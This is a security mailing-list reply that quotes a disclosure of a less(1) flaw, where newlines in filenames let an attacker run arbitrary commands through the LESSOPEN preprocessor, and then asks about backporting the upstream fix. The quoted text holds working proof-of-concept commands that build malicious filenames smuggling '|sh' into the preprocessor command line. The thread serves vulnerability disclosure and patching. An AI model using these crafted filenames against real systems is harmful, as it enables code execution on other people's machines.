Jakub Wilk <jw...@jwilk.net> writes:

> less(1) does not correctly escape newlines in pathnames when
> constructing command line of the input preprocessor. If a user ran
> less(1) on files with untrusted names, this could result in execution
> of arbitrary code.
>
> The input preprocessor is enabled by the LESSOPEN environment variable.
> But if you didn't set it, don't worry, because zless(1) (or xzless(1),
> or zstdless(1)) sets it for you:
>
>    $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')"
>    $ zless ./*
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    ./
>    |sh (file 1 of 2) (END) - Next: ./\
>
> On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the
> bug can be exploited even without the wrapper:
>

Unfortunately, it looks like we're the same in Gentoo.

>    $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 
> 'cowsay pwned' > m/oo && chmod +x m/oo
>    $ less ./*/*
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    ./
>    |m/oo (file 1 of 2) (END) - Next: ./m/oo
>
>
> Upstream fix:
> https://github.com/gwsw/less/commit/007521ac3c95bc76

Thanks.

Any idea if upstream plan to backport it? It doesn't apply cleanly I
think to the last release 643 (653 is a beta) but I'll try do it now.

Attachment: signature.asc
Description: PGP signature

Reply via email to